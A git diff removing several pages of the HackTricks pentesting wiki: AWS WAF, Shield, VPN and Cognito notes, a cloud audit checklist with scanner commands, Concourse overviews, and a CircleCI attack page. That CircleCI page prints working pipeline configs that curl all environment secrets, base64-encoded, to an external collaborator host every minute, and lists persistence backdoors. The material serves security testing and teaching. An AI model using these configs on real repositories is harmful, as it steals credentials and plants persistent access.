-A **rule group** (a set of WAF rules together) can be added to an AWS Firewall Manager Policy which is then associated to AWS resources, such as your cloudfront distributions or application load balances.
-
-**Firewall Manager policies only allow "Block" or "Count"** options for a rule group (no "Allow" option).
-
-# AWS Shield
-
-AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS.
-
-**AWS Shield Standard** is **free** to everyone, and it offers DDoS **protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53.
-
-**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**.
-
-Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.**
-
-# VPN
-
-## Site-to-Site VPN
-
-**Connect your on premisses network with your VPC.**
-
-### Concepts
-
-* **VPN connection**: A secure connection between your on-premises equipment and your VPCs.
-* **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS.
-
- Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability.
-* **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device.
-* **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection.
-* **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
-* **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
-
-### Limitations
-
-* IPv6 traffic is not supported for VPN connections on a virtual private gateway.
-* An AWS VPN connection does not support Path MTU Discovery.
-
-In addition, take the following into consideration when you use Site-to-Site VPN.
-
-* When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks.
-
-## Components of Client VPN
-
-**Connect from your machine to your VPC**
-
-### Concepts
-
-* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated.
-* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone.
-* **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks.
-* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks.
-* **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session.
-* **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`.
-* **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443.
-* **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address.
-* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues.
-* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client.
-
-### Limitations
-
-* **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table.
-* Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.**
-* A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint.
-* The **client CIDR range cannot be changed** after you create the Client VPN endpoint.
-* The **subnets** associated with a Client VPN endpoint **must be in the same VPC**.
-* You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**.
-* A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**.
-* Client VPN supports **IPv4** traffic only.
-* Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**.
-* If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format.
-
- ```
- SCRV1::
- ```
-* The self-service portal is **not available for clients that authenticate using mutual authentication**.
-
-# Amazon Cognito
-
-Amazon Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a **third party** such as Facebook, Amazon, Google or Apple.
-
-The two main components of Amazon Cognito are user pools and identity pools. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to grant your users **access to other AWS services**. You can use identity pools and user pools separately or together.
-
-## **User pools**
-
-A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK.
-
-User pools provide:
-
-* Sign-up and sign-in services.
-* A built-in, customizable web UI to sign in users.
-* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool.
-* User directory management and user profiles.
-* Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification.
-* Customized workflows and user migration through AWS Lambda triggers.
-
-## **Identity pools**
-
-With an identity pool, your users can **obtain temporary AWS credentials to access AWS services**, such as Amazon S3 and DynamoDB. Identity pools support anonymous guest users, as well as the following identity providers that you can use to authenticate users for identity pools:
-
-* Amazon Cognito user pools
-* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple
-* OpenID Connect (OIDC) providers
-* SAML identity providers
-* Developer authenticated identities
-
-To save user profile information, your identity pool needs to be integrated with a user pool.
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/circleci.md b/cloud-security/circleci.md
deleted file mode 100644
index d26f49b75..000000000
--- a/cloud-security/circleci.md
+++ /dev/null
@@ -1,291 +0,0 @@
-# CircleCI
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-## Basic Information
-
-[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
-
-## Permissions
-
-**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
-In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
-
-However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**.
-
-## Env Variables & Secrets
-
-According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow.
-
-### Built-in env variables
-
-Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
-
-### Clear text
-
-You can declare them in clear text inside a **command**:
-
-```yaml
-- run:
- name: "set and echo"
- command: |
- SECRET="A secret"
- echo $SECRET
-```
-
-You can declare them in clear text inside the **run environment**:
-
-```yaml
-- run:
- name: "set and echo"
- command: echo $SECRET
- environment:
- SECRET: A secret
-```
-
-You can declare them in clear text inside the **build-job environment**:
-
-```yaml
-jobs:
- build-job:
- docker:
- - image: cimg/base:2020.01
- environment:
- SECRET: A secret
-```
-
-You can declare them in clear text inside the **environment of a container**:
-
-```yaml
-jobs:
- build-job:
- docker:
- - image: cimg/base:2020.01
- environment:
- SECRET: A secret
-```
-
-### Project Secrets
-
-These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
-You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_
-
-![](<../.gitbook/assets/image (662) (1) (1).png>)
-
-{% hint style="danger" %}
-The "**Import Variables**" functionality allows to **import variables from other projects** to this one.
-{% endhint %}
-
-### Context Secrets
-
-These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
-
-![](<../.gitbook/assets/image (661).png>)
-
-{% hint style="success" %}
-However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\
-This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
-{% endhint %}
-
-## Attacks
-
-### Search Clear Text Secrets
-
-If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
-
-### Secret Env Vars & Context enumeration
-
-Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_.
-
-### Exfiltrate Project secrets
-
-{% hint style="warning" %}
-In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
-{% endhint %}
-
-{% hint style="danger" %}
-The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**.
-{% endhint %}
-
-All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**:
-
-```yaml
-version: 2.1
-
-jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "env | base64"
-
-workflows:
- exfil-env-workflow:
- jobs:
- - exfil-env
-```
-
-If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
-
-```yaml
-version: 2.1
-
-jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
-
-# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
-workflows:
- exfil-env-workflow:
- triggers:
- - schedule:
- cron: "* * * * *"
- filters:
- branches:
- only:
- - circleci-project-setup
- jobs:
- - exfil-env
-```
-
-### Exfiltrate Context Secrets
-
-You need to **specify the context name** (this will also exfiltrate the project secrets):
-
-```yaml
-```
-
-```yaml
-version: 2.1
-
-jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "env | base64"
-
-workflows:
- exfil-env-workflow:
- jobs:
- - exfil-env:
- context: Test-Context
-```
-
-If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
-
-```yaml
-version: 2.1
-
-jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
-
-# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
-workflows:
- exfil-env-workflow:
- triggers:
- - schedule:
- cron: "* * * * *"
- filters:
- branches:
- only:
- - circleci-project-setup
- jobs:
- - exfil-env:
- context: Test-Context
-```
-
-{% hint style="warning" %}
-Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
-{% endhint %}
-
-### Escape to Cloud
-
-**CircleCI** gives you the option to run **your builds in their machines or in your own**.\
-By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
-
-Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions):
-
-```yaml
-jobs:
- exfil-env:
- #docker:
- # - image: cimg/base:stable
- machine:
- image: ubuntu-2004:current
-```
-
-Or even a docker container with access to a remote docker service:
-
-```yaml
-jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - setup_remote_docker:
- version: 19.03.13
-```
-
-### Persistence
-
-* It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access.
- * _https://app.circleci.com/settings/user/tokens_
-* It's possible to **create projects tokens** to access the project with the permissions given to the token.
- * _https://app.circleci.com/settings/project/github/\/\/api_
-* It's possible to **add SSH keys** to the projects.
- * _https://app.circleci.com/settings/project/github/\/\/ssh_
-* It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday.
- * Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday.
-* If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
-* You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/cloud-security/cloud-security-review.md b/cloud-security/cloud-security-review.md
deleted file mode 100644
index 691e26fdf..000000000
--- a/cloud-security/cloud-security-review.md
+++ /dev/null
@@ -1,149 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-**Check for nice cloud hacking tricks in** [**https://hackingthe.cloud**](https://hackingthe.cloud)
-
-# Generic tools
-
-There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section.
-
-## [ScoutSuite](https://github.com/nccgroup/ScoutSuite)
-
-AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
-
-```
-pip3 install scoutsuite
-```
-
-## [cs-suite](https://github.com/SecurityFTW/cs-suite)
-
-AWS, GCP, Azure, DigitalOcean
-
-```
-git clone https://github.com/SecurityFTW/cs-suite.git && cd cs-suite/
-pip install virtualenv
-virtualenv -p python2.7 venv
-source venv/bin/activate
-pip install -r requirements.txt
-python cs.py --help
-```
-
-## Nessus
-
-Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**.
-
-## Common Sense
-
-Take a look to the **network access rules** and detect if the services are correctly protected:
-
-* ssh available from everywhere?
-* Unencrypted services running (telnet, http, ...)?
-* Unprotected admin consoles?
-* In general, check that all services are correctly protected depending on their needs
-
-# Azure
-
-Access the portal here: [http://portal.azure.com/](http://portal.azure.com)\
-To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**.
-
-It is recommended to **install azure-cli** in a **linux** and **windows** virtual machines (to be able to run powershell and python scripts): [https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest)\
-Then, run `az login` to login. Note the **account information** and **token** will be **saved** inside _\/.azure_ (in both Windows and Linux).
-
-Remember that if the **Security Centre Standard Pricing Tier** is being used and **not** the **free** tier, you can **generate** a **CIS compliance scan report** from the azure portal. Go to _Policy & Compliance-> Regulatory Compliance_ (or try to access [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22)).\
-\_\_If the company is not paying for a Standard account you may need to review the **CIS Microsoft Azure Foundations Benchmark** by "hand" (you can get some help using the following tools). Download it from [**here**](https://www.newnettechnologies.com/cis-benchmark.html?keyword=\&gclid=Cj0KCQjwyPbzBRDsARIsAFh15JYSireQtX57C6XF8cfZU3JVjswtaLFJndC3Hv45YraKpLVDgLqEY6IaAhsZEALw\_wcB#microsoft-azure).
-
-## Run scanners
-
-Run the scanners to look for **vulnerabilities** and **compare** the security measures implemented with **CIS**.
-
-```bash
-pip install scout
-scout azure --cli --report-dir
-
-#Fix azureaudit.py before launching cs.py
-#Adding "j_res = {}" on line 1074
-python cs.py -env azure
-
-#Azucar is an Azure security scanner for PowerShell (https://github.com/nccgroup/azucar)
-#Run it from its folder
-.\Azucar.ps1 -AuthMode Interactive -ForceAuth -ExportTo EXCEL
-
-#Azure-CIS-Scanner,CIS scanner for Azure (https://github.com/kbroughton/azure_cis_scanner)
-pip3 install azure-cis-scanner #Install
-azscan #Run, login before with `az login`
-```
-
-## Attack Graph
-
-[**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an βattack graphβ of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.
-
-## More checks
-
-* Check for a **high number of Global Admin** (between 2-4 are recommended). Access it on: [https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview)
-* Global admins should have MFA activated. Go to Users and click on Multi-Factor Authentication button.
-
-![](<../.gitbook/assets/image (293).png>)
-
-* Dedicated admin account shouldn't have mailboxes (they can only have mailboxes if they have Office 365).
-* Local AD shouldn't be sync with Azure AD if not needed([https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/AzureADConnect](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/AzureADConnect)). And if synced Password Hash Sync should be enabled for reliability. In this case it's disabled:
-
-![](<../.gitbook/assets/image (294).png>)
-
-* **Global Administrators** shouldn't be synced from a local AD. Check if Global Administrators emails uses the domain **onmicrosoft.com**. If not, check the source of the user, the source should be Azure Active Directory, if it comes from Windows Server AD, then report it.
-
-![](<../.gitbook/assets/image (295).png>)
-
-* **Standard tier** is recommended instead of free tier (see the tier being used in _Pricing & Settings_ or in [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/24](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/24))
-* **Periodic SQL servers scans**:
-
- _Select the SQL server_ --> _Make sure that 'Advanced data security' is set to 'On'_ --> _Under 'Vulnerability assessment settings', set 'Periodic recurring scans' to 'On', and configure a storage account for storing vulnerability assessment scan results_ --> _Click Save_
-* **Lack of App Services restrictions**: Look for "App Services" in Azure ([https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites)) and check if anyone is being used. In that case check go through each App checking for "Access Restrictions" and there aren't rules, report it. The access to the app service should be restricted according to the needs.
-
-# Office365
-
-You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features via the web application.
-
-# AWS
-
-Get objects in graph: [https://github.com/FSecureLABS/awspx](https://github.com/FSecureLABS/awspx)
-
-# GPC
-
-{% content-ref url="gcp-security/" %}
-[gcp-security](gcp-security/)
-{% endcontent-ref %}
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/concourse/README.md b/cloud-security/concourse/README.md
deleted file mode 100644
index 2745687e4..000000000
--- a/cloud-security/concourse/README.md
+++ /dev/null
@@ -1,67 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-**Concourse allows you to build pipelines to automatically run tests, actions and build images whenever you need it (time based, when something happens...)**
-
-# Concourse Architecture
-
-Learn how the concourse environment is structured in:
-
-{% content-ref url="concourse-architecture.md" %}
-[concourse-architecture.md](concourse-architecture.md)
-{% endcontent-ref %}
-
-# Run Concourse Locally
-
-Learn how you can run a concourse environment locally to do your own tests in:
-
-{% content-ref url="concourse-lab-creation.md" %}
-[concourse-lab-creation.md](concourse-lab-creation.md)
-{% endcontent-ref %}
-
-# Enumerate & Attack Concourse
-
-Learn how you can enumerate the concourse environment and abuse it in:
-
-{% content-ref url="concourse-enumeration-and-attacks.md" %}
-[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md)
-{% endcontent-ref %}
-
-# References
-
-* [https://concourse-ci.org/internals.html#architecture-worker](https://concourse-ci.org/internals.html#architecture-worker)
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/concourse/concourse-architecture.md b/cloud-security/concourse/concourse-architecture.md
deleted file mode 100644
index 09f585ac4..000000000
--- a/cloud-security/concourse/concourse-architecture.md
+++ /dev/null
@@ -1,52 +0,0 @@
-# Concourse Architecture
-
-## Concourse Architecture
-
-
-
-Support HackTricks and get benefits!
-
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-## Architecture
-
-![](<../../.gitbook/assets/image (307) (3) (1).png>)
-
-### ATC: web UI & build scheduler
-
-The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
-
-The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
-
-### TSA: worker registration & forwarding
-
-The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
-
-The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer.
-
-The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
-
-### Workers
-
